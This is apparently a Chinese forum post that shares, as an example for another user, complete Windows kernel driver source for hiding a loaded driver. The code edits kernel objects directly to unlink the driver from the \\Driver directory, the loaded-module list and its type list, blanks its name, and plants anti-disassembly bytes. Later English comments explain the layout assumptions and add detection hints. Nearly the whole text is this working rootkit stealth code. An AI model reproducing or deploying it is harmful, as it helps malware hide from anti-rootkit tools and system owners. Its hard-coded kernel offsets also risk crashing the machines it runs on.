申请POOL,把基本的处理代码放到这个POOL中,在这个POOL中再完成跳转之类的。。。这样就使一些ARK显示为UNKNOWN IMAGE了。。。跟驱动隐藏是不一样的。。。
发个驱动隐藏的例子给你吧。。。
#include "ntddk.h"
#include "HideModule.h"
//////// http://hi.baidu.com/sysnap 2008
// Interfaces exported by the hide-module manager: one routine per place a loaded
// driver is visible in. Each is installed into HideModuleObjectManager by
// InitializeHideModuleObjectManager() and called through that table from DriverEntry().
// (Declared with empty parentheses, i.e. unspecified parameters, not "(void)".)
void ObHideFromTypeList();
void ObHideFromDriverObjectName();
void ObHideFromPsLoadedModuleList();
void ObHideFromFileInfo();
void ObHideFromObjectDirectory(POBJECT_DIRECTORY pObjDir);
// Emits five raw bytes (0xff 0x74 0x51 0xe8 0x00) straight into the code stream
// through MSVC inline assembly. Every use on this page sits behind a guard that
// is not expected to hold at run time (a driver-object pointer equal to 11, or a
// call counter at a value the single call path does not reach), so the bytes are
// presumably never executed; the name suggests they exist to confuse static
// disassembly. Executing them would be undefined behaviour.
// Analyst note: raw _emit bytes behind an always-false guard are themselves a
// strong static indicator of anti-analysis kernel code.
#define ANTI_RESERVE_A() \
__asm{_emit 0xff};\
__asm{_emit 0x74};\
__asm{_emit 0x51};\
__asm{_emit 0xe8};\
__asm{_emit 0x00};
// Bundle of the driver object to hide plus function pointers to the hide routines.
// A single global instance (HideModuleObjectManager) is filled in by
// InitializeHideModuleObjectManager() and read by every routine below.
typedef struct _Hide_Module
{
    PDRIVER_OBJECT HideDriverObject;          // driver object whose traces are removed
    void (*ObHideFromTypeList)();             // unlinks CreatorInfo->TypeList (see ObHideFromTypeList)
    void (*ObHideFromDriverObjectName)();     // zeroes the DriverName string at +0x1c
    void (*ObHideFromPsLoadedModuleList)();   // unlinks the list entry reached via offset 20 (DriverSection)
    void (*ObHideFromFileInfo)();             // placeholder, does nothing on this page
    void (*ObHideFromObjectDirectory)(POBJECT_DIRECTORY pObjDir); // unlinks from the \Driver directory walk
} Hide_Module;
// The single global hide dispatcher; initialised once from DriverEntry() before use.
Hide_Module HideModuleObjectManager;
// Fills the global HideModuleObjectManager: stores the driver object to be hidden
// and wires every function pointer to its implementation in this file.
// Must run before any HideModuleObjectManager.* routine is called.
void InitializeHideModuleObjectManager(PDRIVER_OBJECT HideDriverObject)
{
    Hide_Module *mgr = &HideModuleObjectManager;

    mgr->HideDriverObject = HideDriverObject;

    // Dispatch table: one entry per visibility surface handled on this page.
    mgr->ObHideFromTypeList = ObHideFromTypeList;
    mgr->ObHideFromPsLoadedModuleList = ObHideFromPsLoadedModuleList;
    mgr->ObHideFromObjectDirectory = ObHideFromObjectDirectory;
    mgr->ObHideFromFileInfo = ObHideFromFileInfo;
    mgr->ObHideFromDriverObjectName = ObHideFromDriverObjectName;
}
// Copied from the NT object manager: pops the FIRST entry of hash bucket HashIndex
// in Directory and returns it detached (NextEntry cleared). The comment below
// records the assumption the original relies on — a preceding lookup moved the
// wanted entry to the bucket head. The caller on this page
// (ObHideFromObjectDirectory) passes the bucket index of an entry it found
// anywhere in the chain, so whatever sits at the head of that bucket is removed,
// not necessarily the entry for the hidden driver. An empty bucket (NULL head)
// is dereferenced without a check. The detached entry is not freed here.
POBJECT_DIRECTORY_ENTRY
ObpUnlinkDirectoryEntry (
    IN POBJECT_DIRECTORY Directory,
    IN ULONG HashIndex
    )
{
    POBJECT_DIRECTORY_ENTRY *HeadDirectoryEntry;
    POBJECT_DIRECTORY_ENTRY DirectoryEntry;
    //
    // The lookup path places the object in the front of the list, so basically
    // we find the object immediately
    //
    HeadDirectoryEntry = (POBJECT_DIRECTORY_ENTRY *)&Directory->HashTable[ HashIndex ];
    DirectoryEntry = *HeadDirectoryEntry;
    //
    // Unlink the entry from the head of the bucket chain and free the
    // memory for the entry.
    //
    *HeadDirectoryEntry = DirectoryEntry->NextEntry;
    DirectoryEntry->NextEntry = NULL;   // the returned entry no longer points into the chain
    return DirectoryEntry;
}
// Returns the OBJECT_HEADER_CREATOR_INFO laid out immediately in front of
// ObjectHeader when the header's OB_FLAG_CREATOR_INFO bit says one is present,
// otherwise NULL. Mirrors the object-manager helper of the same name.
FORCEINLINE
POBJECT_HEADER_CREATOR_INFO
OBJECT_HEADER_TO_CREATOR_INFO (
    IN POBJECT_HEADER ObjectHeader
    )
{
    POBJECT_HEADER_CREATOR_INFO info = NULL;

    // The optional creator-info sub-header sits directly before the main header,
    // hence "header pointer minus one creator-info struct".
    if (ObjectHeader->Flags & OB_FLAG_CREATOR_INFO) {
        info = ((POBJECT_HEADER_CREATOR_INFO)ObjectHeader) - 1;
        __assume(info != NULL);
    }
    return info;
}
// KeDelayExecutionThread intervals are in 100 ns units and a negative value
// means "relative to now": -10 is one microsecond, -10000 one millisecond.
#define DELAY_ONE_MICROSECOND (-10)
#define DELAY_ONE_MILLISECOND (DELAY_ONE_MICROSECOND*1000)
// Blocks the current thread for roughly msec milliseconds (kernel mode,
// non-alertable) by handing a relative interval to KeDelayExecutionThread.
VOID ObSleep(LONG msec)
{
    LARGE_INTEGER interval;

    // Relative (negative) interval in 100 ns units, scaled up from one millisecond.
    interval.QuadPart = (LONGLONG)DELAY_ONE_MILLISECOND * msec;
    KeDelayExecutionThread(KernelMode, 0, &interval);
}
//PDRIVER_OBJECT g_pDriverObject;
// Walks the object-directory hash table rooted at pObjDir, recursing into every
// sub-directory, and unlinks the bucket holding HideDriverObject so the driver no
// longer appears when the \Driver directory is enumerated (what object browsers
// and many ARK tools list).
// Every access goes through undocumented, build-specific layouts (hard-coded
// offsets below), no object-manager directory lock is taken
// (KeEnterCriticalRegion only blocks APC delivery), and faults are silently
// swallowed by __try/__except — so this is inherently unstable across kernel
// builds and under concurrent directory lookups.
// Detection note: only a list link is cut; the driver object itself stays in
// memory, so cross-view comparison (directory enumeration vs. pool/handle scan)
// can still expose it.
void ObHideFromObjectDirectory(POBJECT_DIRECTORY pObjDir) // pObjDir: directory node to walk (the parent)
{
    POBJECT_DIRECTORY_ENTRY pDirectoryEntry,pEntryPrev = NULL;   // pEntryPrev is written but never read
    POBJECT_HEADER pObjectHeader;
    PVOID Object;
    int i;
    PUNICODE_STRING unipObjectTypeName,uniHideDriveName;          // uniHideDriveName is unused
    POBJECT_DIRECTORY tmpObjDir,pDirectory;
    pDirectory = pObjDir;
    KeEnterCriticalRegion( );   // disables normal kernel APCs only; this is NOT the directory lock
    // The directory object's body is an array of hash buckets; the original comment
    // says 37 elements. NOTE(review): the bound here is 36, so index 36 is never
    // visited — confirm whether that is intended.
    for(i = 0; i < 36; i ++)
    {
        pDirectoryEntry = pDirectory->HashTable[i]; // head of bucket i
        // DbgPrint("---0x%x\n", pDirectoryEntry);
        if(HideModuleObjectManager.HideDriverObject == (PVOID)11)   // opaque predicate: a driver-object pointer is never 11
        {
            ANTI_RESERVE_A();   // raw bytes, presumably never reached (see the macro)
        }
        while(pDirectoryEntry)
        {
            __try{
                if(pDirectoryEntry)   // redundant: already tested by the while condition
                {
                    Object = pDirectoryEntry->pObject ;                 // object body held by this entry
                    pObjectHeader = OBJECT_TO_OBJECT_HEADER( Object );  // its OBJECT_HEADER
                    // Hard-coded layout: header+8 is presumably OBJECT_HEADER.Type and
                    // type+0x40 that type's Name (UNICODE_STRING) on the kernel build this
                    // was written for — TODO confirm per build; wrong offsets mean a wild read.
                    unipObjectTypeName = (PUNICODE_STRING)((*(ULONG*)((ULONG)pObjectHeader+8)+0x40));
                    // Many object types live here; only the hidden driver and sub-directories matter.
                    if(HideModuleObjectManager.HideDriverObject == Object)
                        // Unlinks the HEAD of bucket i, which is this entry only when it is first
                        // in the chain (see ObpUnlinkDirectoryEntry). If it was the head, its
                        // NextEntry is now NULL and the walk of this bucket ends after the advance below.
                        ObpUnlinkDirectoryEntry (pDirectory,i);
                    if(wcscmp(unipObjectTypeName->Buffer,L"Directory")==0)
                    {
                        tmpObjDir = Object;
                        ObHideFromObjectDirectory( tmpObjDir); // object type is "Directory": recurse into it
                    }
                }
                pEntryPrev = pDirectoryEntry;
                pDirectoryEntry = pDirectoryEntry->NextEntry;
            }__except(EXCEPTION_EXECUTE_HANDLER)
            {
                // Any fault (bad offset, torn list) is swallowed. pDirectoryEntry is not
                // advanced in that case, so a fault before the advance re-enters the same entry.
            }
        }
    }
    KeLeaveCriticalRegion();
}
// Unlinks the loader-list node reached through the driver object from its
// doubly-linked list by re-pointing its two neighbours at each other. The node's
// own Flink/Blink are left intact, still pointing into the list it left.
// Offset 20 (0x14) is a hard-coded DRIVER_OBJECT field position — presumably
// DriverSection, matching the ->DriverSection access in ObHideFromFileInfo — and
// DRIVER_DATA comes from HideModule.h (not shown); both are layout assumptions
// tied to one 32-bit kernel build (ULONG is used as a pointer below).
// Detection note: the image and its pool allocations stay in memory; only the
// list link is cut, so a scan that does not rely on this list still finds it.
void ObHideFromPsLoadedModuleList()
{
    DRIVER_DATA* driverData;
    driverData = *((DRIVER_DATA**)((ULONG)HideModuleObjectManager.HideDriverObject + 20));
    if( driverData != NULL )
    {
        // Blink->Flink = Flink, done through a raw 32-bit write to the first field of the neighbour
        *((PULONG)driverData->listEntry.Blink) = (ULONG)driverData->listEntry.Flink;
        // Flink->Blink = Blink
        driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;
    }
}
// Blanks the driver object's name: the DriverName string buffer is zeroed in
// place and both lengths are set to 0, so the DRIVER_OBJECT no longer carries a
// readable name. 0x1c is the hard-coded field offset noted in the comment
// (32-bit layout); the buffer itself is neither freed nor detached.
void ObHideFromDriverObjectName()
{
    // +0x01c DriverName : _UNICODE_STRING
    PUNICODE_STRING ObDriverName;
    ObDriverName = (PUNICODE_STRING)((ULONG)HideModuleObjectManager.HideDriverObject+0x1c);
    RtlZeroMemory(ObDriverName->Buffer,ObDriverName->Length);   // Length is a byte count, as RtlZeroMemory expects
    ObDriverName->Length = 0;
    ObDriverName->MaximumLength = 0;
}
// Removes the driver object from its type's object list: when the object header
// carries creator info, the TypeList link inside it is unlinked and then
// re-initialised to point at itself, so walks starting from the type object no
// longer reach this driver. Leaves a DbgPrint marker in kernel debug output.
// Detection note: the debug string and a self-linked TypeList in a creator-info
// block are both easy artefacts to spot in a memory image.
void ObHideFromTypeList()
{
    POBJECT_HEADER ObjectHeader;
    POBJECT_HEADER_CREATOR_INFO CreatorInfo;
    PVOID Object;
    // Disabled copy of the opaque-predicate guard used elsewhere; see ANTI_RESERVE_A.
    /* if(HideModuleObjectManager.HideDriverObject == (PVOID)11)
    {
    ANTI_RESERVE_A();
    }*/
    Object = (PVOID)HideModuleObjectManager.HideDriverObject;
    ObjectHeader = OBJECT_TO_OBJECT_HEADER(Object);
    CreatorInfo = OBJECT_HEADER_TO_CREATOR_INFO(ObjectHeader);   // NULL when the header has no creator info
    if (CreatorInfo != NULL)
    {
        DbgPrint("---hi type list!!");
        RemoveEntryList(&CreatorInfo->TypeList);
        InitializeListHead(&CreatorInfo->TypeList);   // leave the node self-linked rather than dangling
    }
}
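// Placeholder for hiding PE / image-file information (the original author's
// note: "for inserting PE-related info, reserved for now"). It only locates the
// driver image base through DriverSection and changes nothing.
// Dropped the unused locals the original declared (an unused string and an
// unused PUNICODE_STRING) and added a NULL guard on DriverSection.
void ObHideFromFileInfo()
{
    PLDR_DATA_TABLE_ENTRY ObDriverSection;
    PVOID DriverBase;

    // DriverSection is the loader entry for this image; DllBase is its mapped base.
    ObDriverSection = (PLDR_DATA_TABLE_ENTRY)HideModuleObjectManager.HideDriverObject->DriverSection;
    if (ObDriverSection == NULL)
    {
        return;
    }
    DriverBase = ObDriverSection->DllBase;
    (void)DriverBase;   // intentionally unused until the PE handling is written
}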
// Body of the system thread started from DriverEntry: prints a heartbeat to the
// kernel debugger every 3 s and never returns — the PsTerminateSystemThread call
// after the loop is unreachable. Nothing on this page signals it to stop, so it
// presumably keeps running after the driver that created it is unloaded.
void ObHideTestThread()
{
    for (;;)
    {
        ObSleep(3000);
        DbgPrint(" Im Runing!!");
    }
    PsTerminateSystemThread(STATUS_SUCCESS);   // unreachable; kept for parity with the original
}
// DriverUnload handler: intentionally empty. Nothing is undone here — the list
// links cut above are not restored and the heartbeat thread (ObHideTestThread)
// is not stopped. NOTE(review): unloading the image while that thread is still
// in its loop would presumably leave a thread executing unmapped code — confirm.
VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
}
// Call counter for test(), used as an opaque predicate: test() reaches its raw
// bytes only when it hits 2, DriverEntry only if it is still 0 after the first
// call — neither happens on the single call path shown on this page.
ULONG g=0;
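// Increments the call counter g and, on the second call only, falls into the
// ANTI_RESERVE_A raw-byte sequence. DriverEntry calls it exactly once, so on
// this page that byte sequence is a static-analysis decoy, not a code path.
// The disabled ModuleHide() sketch that followed the guard is kept below under
// #if 0: the original wrapped it in a /* */ block that contained a second /* */
// block, and since C comments do not nest the inner "*/" ended the comment
// early and left a stray "}" and "*/" as live tokens.
void test()
{
    g++;
    if(g==2)
    {
        ANTI_RESERVE_A();
    }
}

#if 0
/* Unfinished sketch, never compiled in: blanks the loader entry's FullDllName
   (and, further disabled, BaseDllName) the same way ObHideFromDriverObjectName
   blanks DRIVER_OBJECT.DriverName. */
VOID ModuleHide()
{
    PUNICODE_STRING ObDriverName;
    PUNICODE_STRING BaseDllName;
    PLDR_DATA_TABLE_ENTRY ObDriverSection;
    ObDriverSection = (PLDR_DATA_TABLE_ENTRY)HideModuleObjectManager.HideDriverObject->DriverSection;
    DbgPrint(" %x %ws",ObDriverSection->DllBase,ObDriverSection->BaseDllName.Buffer);
    ObDriverName = (PUNICODE_STRING)&ObDriverSection->FullDllName;
    RtlZeroMemory(ObDriverName->Buffer,ObDriverName->Length);
    ObDriverName->Length = 0;
    ObDriverName->MaximumLength = 0;
    /* BaseDllName = (PUNICODE_STRING)&ObDriverSection->BaseDllName.Buffer;
    RtlZeroMemory(BaseDllName->Buffer,ObDriverName->Length);
    BaseDllName->Length = 0;
    BaseDllName->MaximumLength = 0;
    */
    // DbgPrint(" %x %ws",ObDriverSection->DllBase,ObDriverSection->BaseDllName.Buffer);
}
#endif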
// Driver entry point: wires up the hide dispatcher for this driver object, walks
// the \Driver object directory to unlink it, blanks its name, unlinks the loader
// and type-list entries, then starts a heartbeat system thread and installs an
// (empty) unload handler. Unused locals (pEntry, pEntryPrev, i) are left over.
// Detection note: taken together these edits are the classic DKOM driver-hiding
// profile — a driver object that pool scanning or handle tables still reach but
// that is absent from the \Driver directory and from the loaded-module list is
// the discrepancy to look for.
NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath)
{
    UNICODE_STRING usDirName;
    OBJECT_ATTRIBUTES oaDirName;
    HANDLE hDir = NULL;
    POBJECT_DIRECTORY pDir = NULL;
    POBJECT_DIRECTORY_ENTRY pEntry, pEntryPrev;   // unused
    NTSTATUS status;
    ULONG i;                                      // unused
    HANDLE hThread=0;
    test();            // g becomes 1 here
    if(g==0)           // opaque predicate: false after test(), so the raw bytes are not reached
    {
        ANTI_RESERVE_A();
    }
    InitializeHideModuleObjectManager(pDriverObject);
    // Open the \Driver object directory and obtain a referenced pointer to its body.
    RtlInitUnicodeString(&usDirName, L"\\Driver");
    InitializeObjectAttributes(&oaDirName, &usDirName, OBJ_CASE_INSENSITIVE, NULL, NULL);
    status = ObOpenObjectByName(&oaDirName, NULL, KernelMode, NULL, GENERIC_READ, NULL, &hDir);
    if(NT_SUCCESS(status))
    {
        // ObjectType is NULL, so no type check on the handle. hDir is only closed on
        // the success path below; a failed reference leaks the handle.
        status = ObReferenceObjectByHandle(hDir, FILE_ANY_ACCESS, NULL, KernelMode, &pDir, NULL);
        if(NT_SUCCESS(status))
        {
            HideModuleObjectManager.ObHideFromObjectDirectory(pDir);   // recursive walk starting at \Driver
            ObDereferenceObject(pDir);
            ZwClose(hDir);
        }
    }
    // Remaining surfaces: name string, (placeholder) file info, loader list, type list.
    HideModuleObjectManager.ObHideFromDriverObjectName();
    HideModuleObjectManager.ObHideFromFileInfo();
    HideModuleObjectManager.ObHideFromPsLoadedModuleList();
    HideModuleObjectManager.ObHideFromTypeList();
    // Heartbeat thread: the create status is ignored and the handle closed at once,
    // so nothing here can ever wait for or stop it.
    PsCreateSystemThread(&hThread,0L,NULL,NULL,NULL,(PKSTART_ROUTINE)ObHideTestThread,NULL);
    if(hThread)
        ZwClose(hThread);
    pDriverObject->DriverUnload = OnUnload;   // OnUnload is empty
    return STATUS_SUCCESS;
}